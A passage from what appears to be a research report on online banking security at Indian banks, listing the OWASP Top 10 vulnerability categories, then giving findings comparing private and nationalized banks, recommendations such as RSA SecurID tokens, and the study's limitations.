   - Injection
   - Cross site scripting
   - Broken Authentication and Session Management
   - Insecure Direct Object References
   - Cross Site Request Forgery (CSRF)
   - Security Misconfiguration
   - Insecure Cryptographic Storage
   - Failure to Restrict URL Access
   - Insufficient Transport Layer Protection
   - Unvalidated Redirects and Forwards
2. The current information security standards available.
3. Customers prefer private banks for online banking.
4. With all the security measures in place, customers have increased faith in banking online.
5. Security measures that have been employed by various banks included in our sample.
6. Private banks have more stringent security systems in place than nationalized banks.

Recommendations
- Nationalized banks should opt for state-of-the-art modern security mechanisms.
- Banks could employ new RSA SecurID tokens as OTP alternatives.
- Using data cards as authentication would add to the security measures.
- Certifying authorities play a huge role in checking online banking security.


Further scope of the study


Due to limited resources, our sample size was restricted to just four banks (one nationalized and three private banks). Time was the biggest constraint that we had during our research, due to which we only included zonal offices in our research. Provided the resources, we can also conduct a study where we can compare Indian banks with the global standards. Given the time, we can conduct a customer satisfaction survey on a national level.


